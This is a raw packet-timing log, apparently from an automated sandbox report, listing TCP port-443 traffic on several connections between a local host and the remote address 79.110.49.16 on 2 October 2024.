Oct 2, 2024 06:25:16.921763897 CEST	443	49714	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:16.921780109 CEST	443	49714	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:16.921848059 CEST	49714	443	192.168.2.6	79.110.49.16
Oct 2, 2024 06:25:16.921855927 CEST	443	49714	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:16.921900034 CEST	49714	443	192.168.2.6	79.110.49.16
Oct 2, 2024 06:25:16.993352890 CEST	443	49714	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:16.993371964 CEST	443	49714	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:16.993438005 CEST	443	49714	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:16.993488073 CEST	49714	443	192.168.2.6	79.110.49.16
Oct 2, 2024 06:25:16.993526936 CEST	443	49714	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:16.993535042 CEST	443	49714	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:16.993540049 CEST	49714	443	192.168.2.6	79.110.49.16
Oct 2, 2024 06:25:16.993580103 CEST	49714	443	192.168.2.6	79.110.49.16
Oct 2, 2024 06:25:16.998397112 CEST	49714	443	192.168.2.6	79.110.49.16
Oct 2, 2024 06:25:17.365253925 CEST	49716	443	192.168.2.6	79.110.49.16
Oct 2, 2024 06:25:17.365314960 CEST	443	49716	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:17.365400076 CEST	49716	443	192.168.2.6	79.110.49.16
Oct 2, 2024 06:25:17.365634918 CEST	49716	443	192.168.2.6	79.110.49.16
Oct 2, 2024 06:25:17.365648985 CEST	443	49716	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:18.004385948 CEST	443	49716	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:18.007138968 CEST	49716	443	192.168.2.6	79.110.49.16
Oct 2, 2024 06:25:18.007170916 CEST	443	49716	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:18.268007040 CEST	443	49716	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:18.268039942 CEST	443	49716	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:18.268069029 CEST	443	49716	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:18.268249989 CEST	49716	443	192.168.2.6	79.110.49.16
Oct 2, 2024 06:25:18.268280029 CEST	443	49716	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:18.268333912 CEST	49716	443	192.168.2.6	79.110.49.16
Oct 2, 2024 06:25:18.268630981 CEST	443	49716	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:18.268685102 CEST	49716	443	192.168.2.6	79.110.49.16
Oct 2, 2024 06:25:18.268691063 CEST	443	49716	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:18.268721104 CEST	443	49716	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:18.268757105 CEST	49716	443	192.168.2.6	79.110.49.16
Oct 2, 2024 06:25:18.268791914 CEST	49716	443	192.168.2.6	79.110.49.16
Oct 2, 2024 06:25:18.270268917 CEST	49716	443	192.168.2.6	79.110.49.16
Oct 2, 2024 06:25:21.937494993 CEST	49723	443	192.168.2.6	79.110.49.16
Oct 2, 2024 06:25:21.937541008 CEST	443	49723	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:21.937619925 CEST	49723	443	192.168.2.6	79.110.49.16
Oct 2, 2024 06:25:21.937825918 CEST	49723	443	192.168.2.6	79.110.49.16
Oct 2, 2024 06:25:21.937844992 CEST	443	49723	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:22.557404041 CEST	443	49723	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:22.563612938 CEST	49723	443	192.168.2.6	79.110.49.16
Oct 2, 2024 06:25:22.563641071 CEST	443	49723	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:22.819068909 CEST	443	49723	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:22.819094896 CEST	443	49723	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:22.819112062 CEST	443	49723	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:22.819178104 CEST	49723	443	192.168.2.6	79.110.49.16
Oct 2, 2024 06:25:22.819219112 CEST	443	49723	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:22.819273949 CEST	49723	443	192.168.2.6	79.110.49.16
Oct 2, 2024 06:25:22.928276062 CEST	443	49723	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:22.928299904 CEST	443	49723	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:22.928371906 CEST	49723	443	192.168.2.6	79.110.49.16
Oct 2, 2024 06:25:22.928412914 CEST	443	49723	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:22.928458929 CEST	49723	443	192.168.2.6	79.110.49.16
Oct 2, 2024 06:25:22.929815054 CEST	443	49723	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:22.929831982 CEST	443	49723	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:22.929897070 CEST	49723	443	192.168.2.6	79.110.49.16
Oct 2, 2024 06:25:22.929908037 CEST	443	49723	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:22.929944992 CEST	49723	443	192.168.2.6	79.110.49.16
Oct 2, 2024 06:25:23.034234047 CEST	443	49723	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:23.034259081 CEST	443	49723	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:23.034316063 CEST	49723	443	192.168.2.6	79.110.49.16
Oct 2, 2024 06:25:23.034339905 CEST	443	49723	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:23.034368992 CEST	49723	443	192.168.2.6	79.110.49.16
Oct 2, 2024 06:25:23.034384966 CEST	49723	443	192.168.2.6	79.110.49.16
Oct 2, 2024 06:25:23.035486937 CEST	443	49723	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:23.035505056 CEST	443	49723	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:23.035557032 CEST	49723	443	192.168.2.6	79.110.49.16
Oct 2, 2024 06:25:23.035567999 CEST	443	49723	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:23.035598040 CEST	49723	443	192.168.2.6	79.110.49.16
Oct 2, 2024 06:25:23.035614967 CEST	49723	443	192.168.2.6	79.110.49.16
Oct 2, 2024 06:25:23.036406994 CEST	443	49723	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:23.036441088 CEST	443	49723	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:23.036475897 CEST	49723	443	192.168.2.6	79.110.49.16
Oct 2, 2024 06:25:23.036483049 CEST	443	49723	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:23.036499023 CEST	443	49723	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:23.036511898 CEST	49723	443	192.168.2.6	79.110.49.16
Oct 2, 2024 06:25:23.036525965 CEST	49723	443	192.168.2.6	79.110.49.16
Oct 2, 2024 06:25:23.036555052 CEST	49723	443	192.168.2.6	79.110.49.16
Oct 2, 2024 06:25:23.045595884 CEST	49723	443	192.168.2.6	79.110.49.16
Oct 2, 2024 06:25:23.058806896 CEST	49725	443	192.168.2.6	79.110.49.16
Oct 2, 2024 06:25:23.058840036 CEST	443	49725	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:23.058926105 CEST	49725	443	192.168.2.6	79.110.49.16
Oct 2, 2024 06:25:23.059175014 CEST	49725	443	192.168.2.6	79.110.49.16
Oct 2, 2024 06:25:23.059186935 CEST	443	49725	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:23.697459936 CEST	443	49725	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:23.707726002 CEST	49725	443	192.168.2.6	79.110.49.16
Oct 2, 2024 06:25:23.707746029 CEST	443	49725	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:23.960025072 CEST	443	49725	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:23.960068941 CEST	443	49725	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:23.960091114 CEST	443	49725	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:23.960185051 CEST	49725	443	192.168.2.6	79.110.49.16
Oct 2, 2024 06:25:23.960185051 CEST	49725	443	192.168.2.6	79.110.49.16
Oct 2, 2024 06:25:23.960202932 CEST	443	49725	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:23.960274935 CEST	49725	443	192.168.2.6	79.110.49.16
Oct 2, 2024 06:25:24.049664974 CEST	443	49725	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:24.049688101 CEST	443	49725	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:24.049792051 CEST	49725	443	192.168.2.6	79.110.49.16
Oct 2, 2024 06:25:24.049810886 CEST	443	49725	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:24.049820900 CEST	49725	443	192.168.2.6	79.110.49.16
Oct 2, 2024 06:25:24.049860001 CEST	49725	443	192.168.2.6	79.110.49.16
Oct 2, 2024 06:25:24.051553965 CEST	443	49725	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:24.051570892 CEST	443	49725	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:24.051618099 CEST	49725	443	192.168.2.6	79.110.49.16
Oct 2, 2024 06:25:24.051624060 CEST	443	49725	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:24.051641941 CEST	49725	443	192.168.2.6	79.110.49.16
Oct 2, 2024 06:25:24.051676035 CEST	49725	443	192.168.2.6	79.110.49.16
Oct 2, 2024 06:25:24.139549017 CEST	443	49725	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:24.139590025 CEST	443	49725	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:24.139689922 CEST	49725	443	192.168.2.6	79.110.49.16
Oct 2, 2024 06:25:24.139704943 CEST	443	49725	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:24.139715910 CEST	443	49725	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:24.139750957 CEST	49725	443	192.168.2.6	79.110.49.16
Oct 2, 2024 06:25:24.139750957 CEST	49725	443	192.168.2.6	79.110.49.16
Oct 2, 2024 06:25:24.171928883 CEST	49725	443	192.168.2.6	79.110.49.16
Oct 2, 2024 06:25:24.183712006 CEST	49727	443	192.168.2.6	79.110.49.16
Oct 2, 2024 06:25:24.183770895 CEST	443	49727	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:24.183902025 CEST	49727	443	192.168.2.6	79.110.49.16
Oct 2, 2024 06:25:24.184135914 CEST	49727	443	192.168.2.6	79.110.49.16
Oct 2, 2024 06:25:24.184154034 CEST	443	49727	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:24.803118944 CEST	443	49727	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:24.812325954 CEST	49727	443	192.168.2.6	79.110.49.16
Oct 2, 2024 06:25:24.812350988 CEST	443	49727	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:25.070449114 CEST	443	49727	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:25.070523977 CEST	443	49727	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:25.070581913 CEST	49727	443	192.168.2.6	79.110.49.16
Oct 2, 2024 06:25:25.071445942 CEST	49727	443	192.168.2.6	79.110.49.16
Oct 2, 2024 06:25:25.075078011 CEST	49728	443	192.168.2.6	79.110.49.16
Oct 2, 2024 06:25:25.075176954 CEST	443	49728	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:25.075278044 CEST	49728	443	192.168.2.6	79.110.49.16
Oct 2, 2024 06:25:25.075467110 CEST	49728	443	192.168.2.6	79.110.49.16
Oct 2, 2024 06:25:25.075503111 CEST	443	49728	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:25.703974962 CEST	443	49728	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:25.705303907 CEST	49728	443	192.168.2.6	79.110.49.16
Oct 2, 2024 06:25:25.705347061 CEST	443	49728	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:25.962291002 CEST	443	49728	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:25.962385893 CEST	443	49728	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:25.962450027 CEST	49728	443	192.168.2.6	79.110.49.16
Oct 2, 2024 06:25:25.963361025 CEST	49728	443	192.168.2.6	79.110.49.16
Oct 2, 2024 06:25:25.967133999 CEST	49729	443	192.168.2.6	79.110.49.16
Oct 2, 2024 06:25:25.967174053 CEST	443	49729	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:25.967243910 CEST	49729	443	192.168.2.6	79.110.49.16
Oct 2, 2024 06:25:25.967467070 CEST	49729	443	192.168.2.6	79.110.49.16
Oct 2, 2024 06:25:25.967482090 CEST	443	49729	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:26.588371038 CEST	443	49729	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:26.639482021 CEST	49729	443	192.168.2.6	79.110.49.16
Oct 2, 2024 06:25:26.639498949 CEST	443	49729	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:26.848058939 CEST	443	49729	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:26.848145008 CEST	443	49729	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:26.848197937 CEST	49729	443	192.168.2.6	79.110.49.16
Oct 2, 2024 06:25:26.849351883 CEST	49729	443	192.168.2.6	79.110.49.16
Oct 2, 2024 06:25:26.853125095 CEST	49730	443	192.168.2.6	79.110.49.16
Oct 2, 2024 06:25:26.853157043 CEST	443	49730	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:26.853230953 CEST	49730	443	192.168.2.6	79.110.49.16
Oct 2, 2024 06:25:26.853554964 CEST	49730	443	192.168.2.6	79.110.49.16
Oct 2, 2024 06:25:26.853566885 CEST	443	49730	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:27.481890917 CEST	443	49730	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:27.483306885 CEST	49730	443	192.168.2.6	79.110.49.16
Oct 2, 2024 06:25:27.483321905 CEST	443	49730	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:27.743927956 CEST	443	49730	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:27.743988991 CEST	443	49730	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:27.744046926 CEST	443	49730	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:27.744208097 CEST	49730	443	192.168.2.6	79.110.49.16
Oct 2, 2024 06:25:27.744208097 CEST	49730	443	192.168.2.6	79.110.49.16
Oct 2, 2024 06:25:27.744223118 CEST	443	49730	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:27.744288921 CEST	49730	443	192.168.2.6	79.110.49.16
Oct 2, 2024 06:25:27.832113028 CEST	443	49730	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:27.832165003 CEST	443	49730	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:27.832204103 CEST	49730	443	192.168.2.6	79.110.49.16
Oct 2, 2024 06:25:27.832211018 CEST	443	49730	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:27.832278967 CEST	49730	443	192.168.2.6	79.110.49.16
Oct 2, 2024 06:25:27.833899021 CEST	443	49730	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:27.833960056 CEST	443	49730	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:27.833980083 CEST	49730	443	192.168.2.6	79.110.49.16
Oct 2, 2024 06:25:27.833986998 CEST	443	49730	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:27.834014893 CEST	49730	443	192.168.2.6	79.110.49.16
Oct 2, 2024 06:25:27.834036112 CEST	49730	443	192.168.2.6	79.110.49.16
Oct 2, 2024 06:25:27.919857025 CEST	443	49730	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:27.919873953 CEST	443	49730	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:27.919967890 CEST	49730	443	192.168.2.6	79.110.49.16
Oct 2, 2024 06:25:27.919974089 CEST	443	49730	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:27.920017004 CEST	49730	443	192.168.2.6	79.110.49.16
Oct 2, 2024 06:25:27.921219110 CEST	443	49730	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:27.921237946 CEST	443	49730	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:27.921291113 CEST	49730	443	192.168.2.6	79.110.49.16
Oct 2, 2024 06:25:27.921295881 CEST	443	49730	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:27.921308041 CEST	443	49730	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:27.921334982 CEST	49730	443	192.168.2.6	79.110.49.16
Oct 2, 2024 06:25:27.921358109 CEST	49730	443	192.168.2.6	79.110.49.16
Oct 2, 2024 06:25:27.922867060 CEST	49730	443	192.168.2.6	79.110.49.16
Oct 2, 2024 06:25:27.945739985 CEST	49731	443	192.168.2.6	79.110.49.16
Oct 2, 2024 06:25:27.945862055 CEST	443	49731	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:27.945951939 CEST	49731	443	192.168.2.6	79.110.49.16
Oct 2, 2024 06:25:27.946221113 CEST	49731	443	192.168.2.6	79.110.49.16
Oct 2, 2024 06:25:27.946259022 CEST	443	49731	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:28.573424101 CEST	443	49731	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:28.574812889 CEST	49731	443	192.168.2.6	79.110.49.16
Oct 2, 2024 06:25:28.574862957 CEST	443	49731	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:28.836678028 CEST	443	49731	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:28.836704016 CEST	443	49731	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:28.836723089 CEST	443	49731	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:28.836801052 CEST	49731	443	192.168.2.6	79.110.49.16
Oct 2, 2024 06:25:28.836853981 CEST	443	49731	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:28.836905003 CEST	49731	443	192.168.2.6	79.110.49.16
Oct 2, 2024 06:25:28.924221039 CEST	443	49731	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:28.924237967 CEST	443	49731	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:28.924331903 CEST	49731	443	192.168.2.6	79.110.49.16
Oct 2, 2024 06:25:28.924390078 CEST	443	49731	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:28.924433947 CEST	49731	443	192.168.2.6	79.110.49.16
Oct 2, 2024 06:25:28.925826073 CEST	443	49731	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:28.925843000 CEST	443	49731	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:28.925915956 CEST	49731	443	192.168.2.6	79.110.49.16
Oct 2, 2024 06:25:28.925926924 CEST	443	49731	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:28.925966024 CEST	49731	443	192.168.2.6	79.110.49.16
Oct 2, 2024 06:25:29.012288094 CEST	443	49731	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:29.012317896 CEST	443	49731	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:29.012454033 CEST	49731	443	192.168.2.6	79.110.49.16
Oct 2, 2024 06:25:29.012497902 CEST	443	49731	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:29.012547016 CEST	49731	443	192.168.2.6	79.110.49.16
Oct 2, 2024 06:25:29.013430119 CEST	443	49731	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:29.013448000 CEST	443	49731	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:29.013531923 CEST	49731	443	192.168.2.6	79.110.49.16
Oct 2, 2024 06:25:29.013545990 CEST	443	49731	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:29.013583899 CEST	49731	443	192.168.2.6	79.110.49.16
Oct 2, 2024 06:25:29.014713049 CEST	443	49731	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:29.014729977 CEST	443	49731	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:29.014801025 CEST	49731	443	192.168.2.6	79.110.49.16
Oct 2, 2024 06:25:29.014811993 CEST	443	49731	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:29.014853954 CEST	49731	443	192.168.2.6	79.110.49.16
Oct 2, 2024 06:25:29.086765051 CEST	443	49731	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:29.086796045 CEST	443	49731	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:29.086905956 CEST	49731	443	192.168.2.6	79.110.49.16
Oct 2, 2024 06:25:29.086940050 CEST	443	49731	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:29.086987019 CEST	49731	443	192.168.2.6	79.110.49.16
Oct 2, 2024 06:25:29.100935936 CEST	443	49731	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:29.100955009 CEST	443	49731	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:29.101169109 CEST	49731	443	192.168.2.6	79.110.49.16
Oct 2, 2024 06:25:29.101212025 CEST	443	49731	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:29.101263046 CEST	49731	443	192.168.2.6	79.110.49.16
Oct 2, 2024 06:25:29.101835012 CEST	443	49731	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:29.101859093 CEST	443	49731	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:29.101914883 CEST	49731	443	192.168.2.6	79.110.49.16
Oct 2, 2024 06:25:29.101933002 CEST	443	49731	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:29.101965904 CEST	49731	443	192.168.2.6	79.110.49.16
Oct 2, 2024 06:25:29.101988077 CEST	49731	443	192.168.2.6	79.110.49.16
Oct 2, 2024 06:25:29.102721930 CEST	443	49731	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:29.102739096 CEST	443	49731	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:29.102824926 CEST	49731	443	192.168.2.6	79.110.49.16
Oct 2, 2024 06:25:29.102840900 CEST	443	49731	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:29.102893114 CEST	49731	443	192.168.2.6	79.110.49.16
Oct 2, 2024 06:25:29.161514997 CEST	443	49731	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:29.161533117 CEST	443	49731	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:29.161598921 CEST	49731	443	192.168.2.6	79.110.49.16
Oct 2, 2024 06:25:29.161637068 CEST	443	49731	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:29.161655903 CEST	49731	443	192.168.2.6	79.110.49.16
Oct 2, 2024 06:25:29.161676884 CEST	49731	443	192.168.2.6	79.110.49.16
Oct 2, 2024 06:25:29.162175894 CEST	443	49731	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:29.162193060 CEST	443	49731	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:29.162249088 CEST	443	49731	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:29.162249088 CEST	49731	443	192.168.2.6	79.110.49.16
Oct 2, 2024 06:25:29.162260056 CEST	443	49731	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:29.162295103 CEST	49731	443	192.168.2.6	79.110.49.16
Oct 2, 2024 06:25:29.162337065 CEST	443	49731	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:29.162379026 CEST	49731	443	192.168.2.6	79.110.49.16
Oct 2, 2024 06:25:29.201455116 CEST	49731	443	192.168.2.6	79.110.49.16
Oct 2, 2024 06:25:29.472002983 CEST	49734	443	192.168.2.6	79.110.49.16
Oct 2, 2024 06:25:29.472034931 CEST	443	49734	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:29.472110987 CEST	49734	443	192.168.2.6	79.110.49.16
Oct 2, 2024 06:25:29.472415924 CEST	49734	443	192.168.2.6	79.110.49.16
Oct 2, 2024 06:25:29.472429037 CEST	443	49734	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:30.312175035 CEST	443	49734	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:30.313323975 CEST	49734	443	192.168.2.6	79.110.49.16
Oct 2, 2024 06:25:30.313349962 CEST	443	49734	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:30.589261055 CEST	443	49734	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:30.589288950 CEST	443	49734	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:30.589307070 CEST	443	49734	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:30.589400053 CEST	49734	443	192.168.2.6	79.110.49.16
Oct 2, 2024 06:25:30.589416981 CEST	443	49734	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:30.589508057 CEST	49734	443	192.168.2.6	79.110.49.16
Oct 2, 2024 06:25:30.676412106 CEST	443	49734	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:30.676439047 CEST	443	49734	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:30.676562071 CEST	49734	443	192.168.2.6	79.110.49.16
Oct 2, 2024 06:25:30.676562071 CEST	49734	443	192.168.2.6	79.110.49.16
Oct 2, 2024 06:25:30.676594973 CEST	443	49734	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:30.676745892 CEST	49734	443	192.168.2.6	79.110.49.16
Oct 2, 2024 06:25:30.677818060 CEST	443	49734	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:30.677835941 CEST	443	49734	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:30.677905083 CEST	49734	443	192.168.2.6	79.110.49.16
Oct 2, 2024 06:25:30.677917957 CEST	443	49734	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:30.677974939 CEST	49734	443	192.168.2.6	79.110.49.16
Oct 2, 2024 06:25:30.764940023 CEST	443	49734	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:30.764965057 CEST	443	49734	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:30.764993906 CEST	443	49734	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:30.765027046 CEST	49734	443	192.168.2.6	79.110.49.16
Oct 2, 2024 06:25:30.765041113 CEST	443	49734	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:30.765149117 CEST	49734	443	192.168.2.6	79.110.49.16
Oct 2, 2024 06:25:30.765149117 CEST	49734	443	192.168.2.6	79.110.49.16
Oct 2, 2024 06:25:30.765152931 CEST	443	49734	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:30.765275002 CEST	49734	443	192.168.2.6	79.110.49.16
Oct 2, 2024 06:25:30.765861034 CEST	49734	443	192.168.2.6	79.110.49.16
Oct 2, 2024 06:25:30.781400919 CEST	49736	443	192.168.2.6	79.110.49.16
Oct 2, 2024 06:25:30.781435013 CEST	443	49736	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:30.781588078 CEST	49736	443	192.168.2.6	79.110.49.16
Oct 2, 2024 06:25:30.782135963 CEST	49736	443	192.168.2.6	79.110.49.16
Oct 2, 2024 06:25:30.782145023 CEST	443	49736	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:31.419300079 CEST	443	49736	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:31.423567057 CEST	49736	443	192.168.2.6	79.110.49.16
Oct 2, 2024 06:25:31.423592091 CEST	443	49736	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:31.684757948 CEST	443	49736	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:31.684833050 CEST	443	49736	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:31.684849024 CEST	443	49736	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:31.684998989 CEST	49736	443	192.168.2.6	79.110.49.16
Oct 2, 2024 06:25:31.685022116 CEST	443	49736	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:31.685075045 CEST	49736	443	192.168.2.6	79.110.49.16
Oct 2, 2024 06:25:31.769731998 CEST	443	49736	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:31.769762993 CEST	443	49736	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:31.769892931 CEST	49736	443	192.168.2.6	79.110.49.16
Oct 2, 2024 06:25:31.769912958 CEST	443	49736	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:31.770067930 CEST	49736	443	192.168.2.6	79.110.49.16
Oct 2, 2024 06:25:31.772180080 CEST	443	49736	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:31.772196054 CEST	443	49736	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:31.772300005 CEST	49736	443	192.168.2.6	79.110.49.16
Oct 2, 2024 06:25:31.772308111 CEST	443	49736	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:31.772478104 CEST	49736	443	192.168.2.6	79.110.49.16
Oct 2, 2024 06:25:31.855606079 CEST	443	49736	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:31.855628967 CEST	443	49736	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:31.856928110 CEST	443	49736	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:31.856973886 CEST	49736	443	192.168.2.6	79.110.49.16
Oct 2, 2024 06:25:31.856991053 CEST	443	49736	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:31.857023001 CEST	443	49736	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:31.857038975 CEST	49736	443	192.168.2.6	79.110.49.16
Oct 2, 2024 06:25:31.858582020 CEST	443	49736	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:31.858597040 CEST	443	49736	79.110.49.16	192.168.2.6
